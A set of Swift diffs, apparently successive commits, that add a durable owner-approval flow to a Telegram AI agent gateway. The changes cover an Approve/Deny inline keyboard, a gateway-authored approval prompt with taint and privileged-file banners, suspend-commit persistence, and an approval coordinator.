@@ -427,6 +557,9 @@ extension RunStoreGRDB {
     return affected
   }
 
+  /// The parked-observation body (§5.3). A resolution overwrites it in place with the real result.
+  static let placeholderObservationContent = "awaiting owner approval"
+
   static func transitionRun(
     _ db: Database,
     runId: Int64,
@@ -569,6 +702,15 @@ private extension RunStoreGRDB {
   static func setSessionTainted(_ db: Database, sessionId: Int64, now: Date) throws {
     try db.execute(
       sql: "UPDATE sessions SET tainted = 1, updated_ts = ? WHERE id = ?",
+      arguments: [now, sessionId]
+    )
+  }
+
+  /// §4.5 set-leg: the sticky private-data flag rides the suspend commit from its first landing
+  /// (D6). The read-leg, gate-leg, and `/new` clear land in Task 23 — this is set-only.
+  static func setSessionPrivateData(_ db: Database, sessionId: Int64, now: Date) throws {
+    try db.execute(
+      sql: "UPDATE sessions SET has_private_data = 1, updated_ts = ? WHERE id = ?",
       arguments: [now, sessionId]
     )
   }

--- a/Sources/ClawData/Stores/Run/RunStoreGRDB.swift
+++ b/Sources/ClawData/Stores/Run/RunStoreGRDB.swift
@@ -488,8 +488,8 @@ extension RunStoreGRDB {
     try db.execute(
       sql: """
         INSERT OR IGNORE INTO outbound_deliveries(run_id, step_index, chat_id, dedup_key, payload,
-          payload_hash, status, created_ts)
-        VALUES (?, ?, ?, ?, ?, ?, 'PENDING', ?)
+          payload_hash, approval_id, reply_markup, status, created_ts)
+        VALUES (?, ?, ?, ?, ?, ?, ?, ?, 'PENDING', ?)
         """,
       arguments: [
         runId,
@@ -498,6 +498,8 @@ extension RunStoreGRDB {
         "\(runId):\(chunk.stepIndex)",
         chunk.payload,
         chunk.payloadHash,
+        chunk.approvalId,
+        chunk.replyMarkup,
         now,
       ]
     )

--- a/Sources/ClawData/Stores/Run/RunStoreGRDB.swift
+++ b/Sources/ClawData/Stores/Run/RunStoreGRDB.swift
@@ -628,7 +628,7 @@ extension RunStoreGRDB {
         runId,
         chunk.stepIndex,
         chunk.chatId,
-        "\(runId):\(chunk.stepIndex)",
+        OutboxDedupKey.make(runId: runId, stepIndex: chunk.stepIndex),
         chunk.payload,
         chunk.payloadHash,
         chunk.approvalId,

--- a/Sources/ClawData/Stores/Run/RunStoreGRDB.swift
+++ b/Sources/ClawData/Stores/Run/RunStoreGRDB.swift
@@ -4,9 +4,6 @@ import GRDB
 
 public struct RunStoreGRDB: RunStore {
   private let database: MappedDatabase
-  /// Injected fault hook for the §5.3 atomicity test only: thrown inside the suspend-commit txn so
-  /// a scripted mid-write failure proves the whole checkpoint rolls back. The public init passes a
-  /// no-op (mirrors `MemoryCommandStoreGRDB.afterClaimForTesting`).
   private let suspendCommitFault: @Sendable () throws -> Void
 
   public init(writer: any DatabaseWriter) {
@@ -229,9 +226,8 @@ public struct RunStoreGRDB: RunStore {
     now: Date
   ) throws -> SuspendedCommitReceipt {
     try database.writeMapping { db in
-      // Lost arbitration (a racing /stop//new already terminated the run) rolls back with no
-      // orphan approval — the FSM refuses RUNNING→AWAITING from any non-running state.
-      guard try Self.transitionRun(db, runId: runId, event: .suspendForApproval, now: now) != nil
+      guard
+        try Self.transitionRun(db, runId: runId, event: .suspendForApproval, now: now) != nil
       else {
         throw StoreError.unexpected("run \(runId) was not RUNNING at suspend commit")
       }
@@ -243,6 +239,7 @@ public struct RunStoreGRDB: RunStore {
           """,
         arguments: [sessionId, runId, commit.assistantContent, now, commit.toolCallsJSON]
       )
+
       for observation in commit.completedObservations {
         try db.execute(
           sql: """
@@ -333,6 +330,7 @@ public struct RunStoreGRDB: RunStore {
       )
 
       try suspendCommitFault()
+
       return SuspendedCommitReceipt(
         approvalId: approvalId,
         observationMessageId: observationMessageId

--- a/Sources/ClawGateway/Response/ApprovalKeyboard.swift
+++ b/Sources/ClawGateway/Response/ApprovalKeyboard.swift
@@ -1,0 +1,55 @@
+/// The inline-keyboard envelope for a durable approval (§4.6/§5.4). `callback_data` is the only
+/// state Telegram echoes back on a tap, so it carries just the single-use nonce and the verdict —
+/// never the approval `id` (opaque and unguessable). `markup` is a DETERMINISTIC JSON string (no
+/// clock, no randomness) so the outbox row it lands in is reproducible; `parse` is STRICT — only
+/// "apr:<nonce>:y" / "apr:<nonce>:n" survive, so a malformed or forged shape is dropped before the
+/// §6.2 auth chain ever runs.
+public enum ApprovalKeyboard {
+  public static let approveVerdict = "y"
+  public static let denyVerdict = "n"
+
+  /// The callback_data namespace. "apr:" + a 22-char base64url nonce + ":y" is 28 bytes — well
+  /// under Telegram's 64-byte cap (spec §4.6).
+  private static let prefix = "apr"
+
+  public static func callbackData(nonce: String, verdict: String) -> String {
+    "\(prefix):\(nonce):\(verdict)"
+  }
+
+  /// Deterministic by construction: a fixed (sorted) key order, no whitespace, no Date or random.
+  /// The nonce is base64url (`[A-Za-z0-9-_]`) and the verdicts/labels are ASCII, so nothing here
+  /// needs JSON escaping. The client decodes this String to an object for the request body (§4.1).
+  public static func markup(nonce: String) -> String {
+    let approve = callbackData(nonce: nonce, verdict: approveVerdict)
+    let deny = callbackData(nonce: nonce, verdict: denyVerdict)
+    return
+      #"{"inline_keyboard":[["#
+      + #"{"callback_data":"\#(approve)","text":"Approve"},"#
+      + #"{"callback_data":"\#(deny)","text":"Deny"}"#
+      + "]]}"
+  }
+
+  /// Structural validation only — the §6.2 chain still verifies the nonce against the store, the
+  /// owner binding, the args-hash, and the policy_version. A colon anywhere but the two framing
+  /// separators (a nonce never contains one) fails the exact-three-parts guard.
+  public static func parse(_ callbackData: String) -> (nonce: String, approve: Bool)? {
+    let parts = callbackData.split(separator: ":", omittingEmptySubsequences: false).map(
+      String.init
+    )
+    guard parts.count == 3, parts[0] == prefix else {
+      return nil
+    }
+    let nonce = parts[1]
+    guard nonce.isEmpty == false else {
+      return nil
+    }
+    switch parts[2] {
+    case approveVerdict:
+      return (nonce, true)
+    case denyVerdict:
+      return (nonce, false)
+    default:
+      return nil
+    }
+  }
+}

--- a/Sources/ClawGateway/Response/ApprovalKeyboard.swift
+++ b/Sources/ClawGateway/Response/ApprovalKeyboard.swift
@@ -8,8 +8,6 @@ public enum ApprovalKeyboard {
   public static let approveVerdict = "y"
   public static let denyVerdict = "n"
 
-  /// The callback_data namespace. "apr:" + a 22-char base64url nonce + ":y" is 28 bytes — well
-  /// under Telegram's 64-byte cap (spec §4.6).
   private static let prefix = "apr"
 
   public static func callbackData(nonce: String, verdict: String) -> String {
@@ -29,20 +27,21 @@ public enum ApprovalKeyboard {
       + "]]}"
   }
 
-  /// Structural validation only — the §6.2 chain still verifies the nonce against the store, the
-  /// owner binding, the args-hash, and the policy_version. A colon anywhere but the two framing
-  /// separators (a nonce never contains one) fails the exact-three-parts guard.
   public static func parse(_ callbackData: String) -> (nonce: String, approve: Bool)? {
-    let parts = callbackData.split(separator: ":", omittingEmptySubsequences: false).map(
-      String.init
-    )
+    let parts =
+      callbackData
+      .split(separator: ":", omittingEmptySubsequences: false)
+      .map(String.init)
+
     guard parts.count == 3, parts[0] == prefix else {
       return nil
     }
+
     let nonce = parts[1]
     guard nonce.isEmpty == false else {
       return nil
     }
+
     switch parts[2] {
     case approveVerdict:
       return (nonce, true)

--- a/Sources/ClawGateway/Response/ToolApprovalPrompt.swift
+++ b/Sources/ClawGateway/Response/ToolApprovalPrompt.swift
@@ -52,7 +52,7 @@ public enum ToolApprovalPrompt {
   }
 
   /// The retired Inc 3b ephemeral trifecta prompt (§9.2), still rendered by `TurnRunner`'s
-  /// pending-approval path (`TurnRunner.swift:198`) until Task 24 deletes the ephemeral flow. Kept
+  /// pending-approval path (`TurnRunner.swift:212`) until Task 24 deletes the ephemeral flow. Kept
   /// exhaustive over `ApprovalReason` so it compiles alongside the durable renderer.
   public static func text(for request: ToolApprovalRequest) -> String {
     switch request.reason {

--- a/Sources/ClawGateway/Response/ToolApprovalPrompt.swift
+++ b/Sources/ClawGateway/Response/ToolApprovalPrompt.swift
@@ -30,6 +30,7 @@ public enum ToolApprovalPrompt {
   public static func text(for input: Input) -> String {
     let recorded = input.recorded
     var lines: [String] = [headline(tool: recorded.tool, reason: recorded.reason)]
+
     if input.taintBanner {
       lines.append(taintBannerText)
     }
@@ -37,17 +38,22 @@ public enum ToolApprovalPrompt {
     // the full URL including query.
     lines.append("Target: \(recorded.canonicalTarget)")
     lines.append("Effect: \(recorded.presentation.blastRadius)")
+
     if input.privilegedFileBanner {
       lines.append(privilegedFileBannerText)
     }
+
     if let preview = recorded.presentation.contentPreview {
       lines.append("Preview:")
       lines.append(preview)
     }
+
     for warning in recorded.presentation.warnings {
       lines.append("⚠ \(warning)")
     }
+
     lines.append("Tap Approve to allow this one action, or Deny to cancel.")
+
     return lines.joined(separator: "\n")
   }
 

--- a/Sources/ClawGateway/Response/ToolApprovalPrompt.swift
+++ b/Sources/ClawGateway/Response/ToolApprovalPrompt.swift
@@ -1,11 +1,59 @@
 import ClawCore
 import Foundation
 
-/// The deterministic, gateway-authored approval prompt (D7/§9.2). The target is the full
-/// canonical form, never model-authored, never truncated (FR-T5). Delivery-only: joined into the
-/// outbox payload, never stored as assistant history. Exhaustive over `ApprovalReason`: a new
-/// approval kind cannot compile without owner-facing copy here.
+/// The deterministic, gateway-authored approval prompt (D7/§5.4). Every owner-visible field is
+/// authored HERE, never by the model, and the fully-resolved canonical target is never truncated
+/// (FR-T5). Delivery-only: joined into the outbox payload, never stored as assistant history.
+/// Exhaustive over `ApprovalReason` — a new approval kind cannot compile without owner-facing copy.
 public enum ToolApprovalPrompt {
+  /// Everything the §5.4 durable-approval prompt renders. The banners are decided by the suspend
+  /// commit (Task 14) from the originating turn's taint state and the target's identity; the
+  /// renderer stays a pure function of its input.
+  public struct Input: Sendable, Equatable {
+    public let recorded: RecordedToolAction
+    /// The originating turn ingested untrusted content (§5.4 TAINT banner).
+    public let taintBanner: Bool
+    /// The canonical target is SOUL/AGENTS/USER/MEMORY .md (§5.4 privileged-file banner).
+    public let privilegedFileBanner: Bool
+
+    public init(recorded: RecordedToolAction, taintBanner: Bool, privilegedFileBanner: Bool) {
+      self.recorded = recorded
+      self.taintBanner = taintBanner
+      self.privilegedFileBanner = privilegedFileBanner
+    }
+  }
+
+  /// The §5.4 durable-approval prompt: a reason-keyed headline, the taint banner, the
+  /// fully-resolved target, blast radius, the privileged-file banner, a size-capped
+  /// secret-redacted preview, and scan warnings — assembled in a fixed order so the owner can
+  /// judge risk at a glance.
+  public static func text(for input: Input) -> String {
+    let recorded = input.recorded
+    var lines: [String] = [headline(tool: recorded.tool, reason: recorded.reason)]
+    if input.taintBanner {
+      lines.append(taintBannerText)
+    }
+    // Fully resolved, never truncated (FR-T5): absolute path after symlink/`..` resolution, or
+    // the full URL including query.
+    lines.append("Target: \(recorded.canonicalTarget)")
+    lines.append("Effect: \(recorded.presentation.blastRadius)")
+    if input.privilegedFileBanner {
+      lines.append(privilegedFileBannerText)
+    }
+    if let preview = recorded.presentation.contentPreview {
+      lines.append("Preview:")
+      lines.append(preview)
+    }
+    for warning in recorded.presentation.warnings {
+      lines.append("⚠ \(warning)")
+    }
+    lines.append("Tap Approve to allow this one action, or Deny to cancel.")
+    return lines.joined(separator: "\n")
+  }
+
+  /// The retired Inc 3b ephemeral trifecta prompt (§9.2), still rendered by `TurnRunner`'s
+  /// pending-approval path (`TurnRunner.swift:198`) until Task 24 deletes the ephemeral flow. Kept
+  /// exhaustive over `ApprovalReason` so it compiles alongside the durable renderer.
   public static func text(for request: ToolApprovalRequest) -> String {
     switch request.reason {
     case .exfilTrifecta:
@@ -21,6 +69,24 @@ public enum ToolApprovalPrompt {
       \(request.action.target)
       This action changes state and needs your explicit approval.
       """
+    }
+  }
+}
+
+// MARK: - Prompt Composition
+
+private extension ToolApprovalPrompt {
+  static let taintBannerText =
+    "⚠ TAINT: this turn read external/untrusted content — inspect the target before approving."
+  static let privilegedFileBannerText =
+    "⚠ PRIVILEGED FILE: this path feeds my system prompt / private-data tier."
+
+  static func headline(tool: String, reason: ApprovalReason) -> String {
+    switch reason {
+    case .askTier:
+      "⚠ I want to run \(tool). This changes state and needs your explicit approval."
+    case .exfilTrifecta:
+      "⚠ I want to run \(tool) while this session holds private data after reading external content."
     }
   }
 }

--- a/Sources/ClawGateway/Routing/ApprovalCoordinator.swift
+++ b/Sources/ClawGateway/Routing/ApprovalCoordinator.swift
@@ -1,0 +1,78 @@
+import ClawCore
+import Logging
+
+/// The process-local resolution of a durable approval. The `approvals` row stays the source of
+/// truth; this only wakes the held lane.
+public enum ApprovalSignal: Sendable, Equatable {
+  case approved
+  case denied(ApprovalDecision)
+}
+
+/// Process-local coordinator between a resolver (callback/ticker/command/boot) and the ONE lane
+/// waiter parked on an approval. Signal buffering closes the race where a resolution lands between
+/// the suspend commit and the waiter's registration (§5.5): a signal with no waiter is retained and
+/// delivered on the next `awaitResolution`.
+public actor ApprovalCoordinator {
+  private var waiters: [Int64: CheckedContinuation<ApprovalSignal, Never>] = [:]
+  private var buffered: [Int64: ApprovalSignal] = [:]
+
+  public init() {}
+
+  /// One waiter per approval id. A buffered signal (resolver won the race) returns immediately.
+  public func awaitResolution(approvalId: Int64) async -> ApprovalSignal {
+    if let signal = buffered.removeValue(forKey: approvalId) {
+      return signal
+    }
+    return await withCheckedContinuation { continuation in
+      waiters[approvalId] = continuation
+    }
+  }
+
+  /// Delivers to a registered waiter, or buffers until one registers (never dropped).
+  public func signal(approvalId: Int64, _ signal: ApprovalSignal) {
+    if let continuation = waiters.removeValue(forKey: approvalId) {
+      continuation.resume(returning: signal)
+    } else {
+      buffered[approvalId] = signal
+    }
+  }
+}
+
+/// The seam `TurnRunner` (suspend) and boot re-park (Task 19) hand the lane hold to. `ApprovalWaiter`
+/// (Tasks 16/19) is the real conformer — it awaits the coordinator, then performs the §6.3 resume or
+/// §6.4 deny. Kept a protocol so Phase 2 wires the placeholder below without a forward dependency on
+/// the Phase 3 waiter.
+public protocol ApprovalParking: Sendable {
+  func park(
+    approvalId: Int64,
+    runId: Int64,
+    sessionId: Int64,
+    chatId: Int64,
+    revalidatePolicyOnApprove: Bool
+  ) async
+}
+
+/// Phase 2 placeholder: HOLDS the session lane by awaiting the coordinator, then returns without
+/// resuming. Production Phase 2 registers no ask-tier tool, so `park` is never reached in
+/// production; the real resume/deny is `ApprovalWaiter` (Tasks 16/19), which replaces this at the
+/// composition root.
+public struct InertApprovalParker: ApprovalParking {
+  private let coordinator: ApprovalCoordinator
+  private let logger: Logger
+
+  public init(coordinator: ApprovalCoordinator, logger: Logger = Logger(label: "approval.parker")) {
+    self.coordinator = coordinator
+    self.logger = logger
+  }
+
+  public func park(
+    approvalId: Int64,
+    runId: Int64,
+    sessionId: Int64,
+    chatId: Int64,
+    revalidatePolicyOnApprove: Bool
+  ) async {
+    let signal = await coordinator.awaitResolution(approvalId: approvalId)
+    logger.debug("approval \(approvalId) resolved as \(signal); Phase 3 waiter completes the run")
+  }
+}

--- a/Sources/ClawGateway/Routing/TurnRunner.swift
+++ b/Sources/ClawGateway/Routing/TurnRunner.swift
@@ -396,13 +396,18 @@ private extension TurnRunner {
     chatId: Int64,
     at committedAt: Date
   ) async throws {
+    // Invariant: `.suspended` is only returned after `outcome.exchanges.append(...)` upstream, so
+    // `exchanges.last` is never nil on this path — this branch is defensive-only, unreachable today.
+    // `usage` here is the SAME intermediate usage AgentRuntime already recorded mid-loop; passing it
+    // to `commitDegradation` would debit `provider_usage` a second time for the same round. Pass
+    // `nil` so this dead fallback can never double-debit even if the invariant above ever broke.
     guard let anchor = outcome.exchanges.last else {
       logger.error("suspended turn for run \(runId) carried no exchange; failing in-band")
       _ = try commitDegradation(
         runId: runId,
         sessionId: sessionId,
         chatId: chatId,
-        usage: usage,
+        usage: nil,
         exchanges: [],
         setTainted: outcome.ingestedUntrusted,
         message: ownerVisiblePayload(reply: Degradation.contextUnavailable, ownerNotices: []),

--- a/Sources/ClawGateway/Routing/TurnRunner.swift
+++ b/Sources/ClawGateway/Routing/TurnRunner.swift
@@ -306,6 +306,11 @@ private extension TurnRunner {
       if origin != .interactive, cap == BudgetGate.proactivePerDayCap {
         await notifyProactiveCapIfTripped(chatId: chatId, runId: runId, sessionId: sessionId)
       }
+    case .suspended:
+      // Phase 2 is DORMANT: no registered tool declares ask-tier, so no production run can suspend.
+      // Task 14 replaces this arm with the durable `runs.commitSuspendedTurn(...)` transaction.
+      // Logged (not fatal) so a stray suspend never crashes the lane before the commit is wired.
+      logger.error("run \(runId) produced .suspended before the suspend commit is wired (Task 14)")
     }
   }
 

--- a/Sources/ClawGateway/Routing/TurnRunner.swift
+++ b/Sources/ClawGateway/Routing/TurnRunner.swift
@@ -421,16 +421,15 @@ private extension TurnRunner {
     let nonce = ApprovalNonce.generate()
     let completed =
       anchor.observations
-      .filter { observation in observation.callId != pending.toolCallId }
-      .map { observation in
-        ToolObservationRow(toolCallId: observation.callId, content: observation.content)
-      }
+      .filter { $0.callId != pending.toolCallId }
+      .map { ToolObservationRow(toolCallId: $0.callId, content: $0.content) }
+
     let commit = SuspendedTurnCommit(
       assistantContent: anchor.assistantContent,
       toolCallsJSON: ToolCallCoding.encode(anchor.toolCalls) ?? "[]",
       completedObservations: completed,
       pending: pending,
-      ownerUserId: chatId,  // §4.4: the run's delivery chat id
+      ownerUserId: chatId,
       nonce: nonce,
       promptChunks: approvalPromptChunks(
         pending: pending,

--- a/Sources/ClawGateway/Routing/TurnRunner.swift
+++ b/Sources/ClawGateway/Routing/TurnRunner.swift
@@ -39,6 +39,12 @@ public struct TurnRunner: TurnDispatching {
   /// same seam ContextBuilder/MessageRouter/SchedulerService already use.
   private let now: @Sendable () -> Date
   private let logger: Logger
+  /// The lane-hold seam: after the suspend commit, `park` awaits the durable approval's resolution
+  /// (§5.5). Phase 2 uses `InertApprovalParker`; Phase 3 swaps in `ApprovalWaiter`.
+  private let parker: any ApprovalParking
+  /// Seconds a suspended approval stays live (spec §4.6). Injected so the commit's `expires_ts` is
+  /// deterministic under test.
+  private let approvalExpirySeconds: Int
 
   /// Most-recent messages pulled for context; `ContextBuilder` then caps by grapheme budget (§9).
   private static let historyLimit = 50
@@ -56,6 +62,8 @@ public struct TurnRunner: TurnDispatching {
     breaker: BudgetBreaker? = nil,
     delivery: (any MessageDelivery)? = nil,
     now: @escaping @Sendable () -> Date = { Date() },
+    parker: any ApprovalParking = InertApprovalParker(coordinator: ApprovalCoordinator()),
+    approvalExpirySeconds: Int = 3600,
     logger: Logger
   ) {
     self.sessionMessages = sessionMessages
@@ -70,6 +78,8 @@ public struct TurnRunner: TurnDispatching {
     self.breaker = breaker
     self.delivery = delivery
     self.now = now
+    self.parker = parker
+    self.approvalExpirySeconds = approvalExpirySeconds
     self.logger = logger
   }
 
@@ -306,11 +316,16 @@ private extension TurnRunner {
       if origin != .interactive, cap == BudgetGate.proactivePerDayCap {
         await notifyProactiveCapIfTripped(chatId: chatId, runId: runId, sessionId: sessionId)
       }
-    case .suspended:
-      // Phase 2 is DORMANT: no registered tool declares ask-tier, so no production run can suspend.
-      // Task 14 replaces this arm with the durable `runs.commitSuspendedTurn(...)` transaction.
-      // Logged (not fatal) so a stray suspend never crashes the lane before the commit is wired.
-      logger.error("run \(runId) produced .suspended before the suspend commit is wired (Task 14)")
+    case .suspended(let pending, let usage):
+      try await suspendForApproval(
+        pending: pending,
+        usage: usage,
+        outcome: outcome,
+        runId: runId,
+        sessionId: sessionId,
+        chatId: chatId,
+        at: committedAt
+      )
     }
   }
 
@@ -363,6 +378,123 @@ private extension TurnRunner {
     notifyOutbox()
 
     return commitResult
+  }
+}
+
+// MARK: - Suspend Commit
+
+private extension TurnRunner {
+  /// Persists the §5.3 checkpoint, drains the prompt, then HOLDS the lane on the durable approval.
+  /// A lost-arbitration race (a /stop//new already terminated the run) or a write fault rolls the
+  /// commit back — there is nothing to park, so the turn simply ends (in-band, no throw escapes).
+  func suspendForApproval(  // swiftlint:disable:this function_parameter_count
+    pending: PendingToolAction,
+    usage: ProviderUsage,
+    outcome: TurnOutcome,
+    runId: Int64,
+    sessionId: Int64,
+    chatId: Int64,
+    at committedAt: Date
+  ) async throws {
+    guard let anchor = outcome.exchanges.last else {
+      logger.error("suspended turn for run \(runId) carried no exchange; failing in-band")
+      _ = try commitDegradation(
+        runId: runId,
+        sessionId: sessionId,
+        chatId: chatId,
+        usage: usage,
+        exchanges: [],
+        setTainted: outcome.ingestedUntrusted,
+        message: ownerVisiblePayload(reply: Degradation.contextUnavailable, ownerNotices: []),
+        action: .turnDegraded,
+        decision: DegradationKind.contextUnavailable.rawValue,
+        at: committedAt
+      )
+      return
+    }
+
+    let nonce = ApprovalNonce.generate()
+    let completed =
+      anchor.observations
+      .filter { observation in observation.callId != pending.toolCallId }
+      .map { observation in
+        ToolObservationRow(toolCallId: observation.callId, content: observation.content)
+      }
+    let commit = SuspendedTurnCommit(
+      assistantContent: anchor.assistantContent,
+      toolCallsJSON: ToolCallCoding.encode(anchor.toolCalls) ?? "[]",
+      completedObservations: completed,
+      pending: pending,
+      ownerUserId: chatId,  // §4.4: the run's delivery chat id
+      nonce: nonce,
+      promptChunks: approvalPromptChunks(
+        pending: pending,
+        outcome: outcome,
+        chatId: chatId,
+        nonce: nonce
+      ),
+      setTainted: outcome.ingestedUntrusted,
+      setPrivateData: outcome.hadPrivateData,
+      expiresTs: committedAt.addingTimeInterval(TimeInterval(approvalExpirySeconds))
+    )
+
+    let receipt: SuspendedCommitReceipt
+    do {
+      receipt = try runs.commitSuspendedTurn(
+        runId: runId,
+        sessionId: sessionId,
+        commit: commit,
+        now: committedAt
+      )
+    } catch StoreError.diskFull {
+      throw StoreError.diskFull
+    } catch {
+      logger.debug("suspend commit did not apply for run \(runId): \(error)")
+      return
+    }
+
+    notifyOutbox()
+    // Holds THIS lane Task until the approval resolves; the Phase 3 waiter performs the resume/deny.
+    await parker.park(
+      approvalId: receipt.approvalId,
+      runId: runId,
+      sessionId: sessionId,
+      chatId: chatId,
+      revalidatePolicyOnApprove: false
+    )
+  }
+
+  /// One outbox chunk carrying the §5.4 prompt text plus the inline keyboard (`replyMarkup`); the
+  /// store stamps its `approval_id` after inserting the row.
+  func approvalPromptChunks(
+    pending: PendingToolAction,
+    outcome: TurnOutcome,
+    chatId: Int64,
+    nonce: String
+  ) -> [OutboxChunk] {
+    let input = ToolApprovalPrompt.Input(
+      recorded: pending.recorded,
+      taintBanner: outcome.ingestedUntrusted,
+      privilegedFileBanner: Self.isPrivilegedFile(pending.recorded.canonicalTarget)
+    )
+    let text = ToolApprovalPrompt.text(for: input)
+    return [
+      OutboxChunk(
+        stepIndex: 0,
+        chatId: chatId,
+        payload: text,
+        payloadHash: ContentHash.fnv1a(text),
+        approvalId: nil,
+        replyMarkup: ApprovalKeyboard.markup(nonce: nonce)
+      )
+    ]
+  }
+
+  /// §5.4 privileged-file banner: the owner-editable prompt files. Basename match on the resolved
+  /// canonical target.
+  static func isPrivilegedFile(_ canonicalTarget: String) -> Bool {
+    let privileged: Set<String> = ["SOUL.md", "AGENTS.md", "USER.md", "MEMORY.md"]
+    return privileged.contains((canonicalTarget as NSString).lastPathComponent)
   }
 }
 

--- a/Sources/ClawGateway/Services/OutboxDispatcher.swift
+++ b/Sources/ClawGateway/Services/OutboxDispatcher.swift
@@ -128,12 +128,20 @@ public struct OutboxDispatcher: Service {
   /// failure of the plain fallback itself propagates — the row stays PENDING for the next drain.
   private func send(_ row: OutboxRow) async throws -> Int64 {
     do {
-      return try await delivery.sendRichMessage(chatId: row.chatId, markdown: row.payload)
+      return try await delivery.sendRichMessage(
+        chatId: row.chatId,
+        markdown: row.payload,
+        replyMarkup: row.replyMarkup
+      )
     } catch {
       logger.warning(
         "rich send failed for run \(row.runId) step \(row.stepIndex), falling back to plain: \(error)"
       )
-      return try await delivery.sendMessage(chatId: row.chatId, text: row.payload)
+      return try await delivery.sendMessage(
+        chatId: row.chatId,
+        text: row.payload,
+        replyMarkup: row.replyMarkup
+      )
     }
   }
 }

--- a/Sources/ClawGateway/Services/OutboxDispatcher.swift
+++ b/Sources/ClawGateway/Services/OutboxDispatcher.swift
@@ -124,8 +124,10 @@ public struct OutboxDispatcher: Service {
   /// Delivers one row, returning the Telegram `message_id` so the caller can record it via `markSent`.
   ///
   /// Sends the payload as rich markdown; on **any** rich-send error it re-sends the same payload as
-  /// plain `sendMessage` so a malformed-markdown reply still lands (F8, "no formatting errors"). A
-  /// failure of the plain fallback itself propagates — the row stays PENDING for the next drain.
+  /// plain `sendMessage` so a malformed-markdown reply still lands (F8, "no formatting errors").
+  /// `replyMarkup` (the inline keyboard) rides both the rich send and the plain fallback, so a
+  /// degraded delivery never drops the approval keyboard. A failure of the plain fallback itself
+  /// propagates — the row stays PENDING for the next drain.
   private func send(_ row: OutboxRow) async throws -> Int64 {
     do {
       return try await delivery.sendRichMessage(

--- a/Sources/ClawTelegram/Client/TelegramClient.swift
+++ b/Sources/ClawTelegram/Client/TelegramClient.swift
@@ -93,7 +93,6 @@ public struct TelegramClient: TelegramTransport {
 
   public func answerCallbackQuery(id: String, text: String?) async throws {
     let request = AnswerCallbackQueryRequest(callbackQueryId: id, text: text)
-    // Telegram always returns `true`; decode as Bool like sendChatAction and discard it.
     let _: Bool = try await callMethod(
       "answerCallbackQuery",
       body: request,
@@ -111,8 +110,6 @@ public struct TelegramClient: TelegramTransport {
       messageId: messageId,
       replyMarkup: replyMarkup.flatMap(JSONValue.parse)
     )
-    // The result is `Message | true` depending on the target; decode permissively as JSONValue so
-    // a Message-shaped success does not surface as a spurious decoding error.
     let _: JSONValue = try await callMethod(
       "editMessageReplyMarkup",
       body: request,
@@ -247,8 +244,6 @@ private struct SendMessageRequest: Encodable {
   let chatId: Int64
   let text: String
   let linkPreviewOptions: LinkPreviewOptions
-  // The button keyboard, already parsed from its JSON string. Its keys (inline_keyboard,
-  // callback_data) are lowercase snake_case, so `.convertToSnakeCase` passes them through as-is.
   let replyMarkup: JSONValue?
 }
 

--- a/Sources/ClawTelegram/Client/TelegramClient.swift
+++ b/Sources/ClawTelegram/Client/TelegramClient.swift
@@ -50,10 +50,15 @@ public struct TelegramClient: TelegramTransport {
   }
 
   public func sendMessage(chatId: Int64, text: String) async throws -> Int64 {
+    try await sendMessage(chatId: chatId, text: text, replyMarkup: nil)
+  }
+
+  public func sendMessage(chatId: Int64, text: String, replyMarkup: String?) async throws -> Int64 {
     let request = SendMessageRequest(
       chatId: chatId,
       text: text,
-      linkPreviewOptions: LinkPreviewOptions(isDisabled: true)
+      linkPreviewOptions: LinkPreviewOptions(isDisabled: true),
+      replyMarkup: replyMarkup.flatMap(JSONValue.parse)
     )
     let message: TMessage = try await callMethod(
       "sendMessage",
@@ -64,10 +69,19 @@ public struct TelegramClient: TelegramTransport {
   }
 
   public func sendRichMessage(chatId: Int64, markdown: String) async throws -> Int64 {
+    try await sendRichMessage(chatId: chatId, markdown: markdown, replyMarkup: nil)
+  }
+
+  public func sendRichMessage(
+    chatId: Int64,
+    markdown: String,
+    replyMarkup: String?
+  ) async throws -> Int64 {
     let request = SendRichMessageRequest(
       chatId: chatId,
       richMessage: InputRichMessage(markdown: markdown),
-      linkPreviewOptions: LinkPreviewOptions(isDisabled: true)
+      linkPreviewOptions: LinkPreviewOptions(isDisabled: true),
+      replyMarkup: replyMarkup.flatMap(JSONValue.parse)
     )
     let message: TMessage = try await callMethod(
       "sendRichMessage",
@@ -75,6 +89,35 @@ public struct TelegramClient: TelegramTransport {
       httpTimeout: Timeout.sendMessageSeconds
     )
     return message.message_id
+  }
+
+  public func answerCallbackQuery(id: String, text: String?) async throws {
+    let request = AnswerCallbackQueryRequest(callbackQueryId: id, text: text)
+    // Telegram always returns `true`; decode as Bool like sendChatAction and discard it.
+    let _: Bool = try await callMethod(
+      "answerCallbackQuery",
+      body: request,
+      httpTimeout: Timeout.shortRequestSeconds
+    )
+  }
+
+  public func editMessageReplyMarkup(
+    chatId: Int64,
+    messageId: Int64,
+    replyMarkup: String?
+  ) async throws {
+    let request = EditMessageReplyMarkupRequest(
+      chatId: chatId,
+      messageId: messageId,
+      replyMarkup: replyMarkup.flatMap(JSONValue.parse)
+    )
+    // The result is `Message | true` depending on the target; decode permissively as JSONValue so
+    // a Message-shaped success does not surface as a spurious decoding error.
+    let _: JSONValue = try await callMethod(
+      "editMessageReplyMarkup",
+      body: request,
+      httpTimeout: Timeout.shortRequestSeconds
+    )
   }
 
   public func sendRichMessageDraft(
@@ -204,12 +247,16 @@ private struct SendMessageRequest: Encodable {
   let chatId: Int64
   let text: String
   let linkPreviewOptions: LinkPreviewOptions
+  // The button keyboard, already parsed from its JSON string. Its keys (inline_keyboard,
+  // callback_data) are lowercase snake_case, so `.convertToSnakeCase` passes them through as-is.
+  let replyMarkup: JSONValue?
 }
 
 private struct SendRichMessageRequest: Encodable {
   let chatId: Int64
   let richMessage: InputRichMessage
   let linkPreviewOptions: LinkPreviewOptions
+  let replyMarkup: JSONValue?
 }
 
 private struct SendChatActionRequest: Encodable {
@@ -219,6 +266,17 @@ private struct SendChatActionRequest: Encodable {
 
 private struct SetMyCommandsRequest: Encodable {
   let commands: [BotMenuCommand]
+}
+
+private struct AnswerCallbackQueryRequest: Encodable {
+  let callbackQueryId: String
+  let text: String?
+}
+
+private struct EditMessageReplyMarkupRequest: Encodable {
+  let chatId: Int64
+  let messageId: Int64
+  let replyMarkup: JSONValue?
 }
 
 /// The Telegram-backed `TypingIndicator` the agent uses during a turn. Errors are swallowed: the

--- a/Sources/ClawTelegram/Wire/WireModels.swift
+++ b/Sources/ClawTelegram/Wire/WireModels.swift
@@ -82,11 +82,37 @@ struct SendRichMessageDraftRequest: Encodable {
   let linkPreviewOptions: LinkPreviewOptions
 }
 
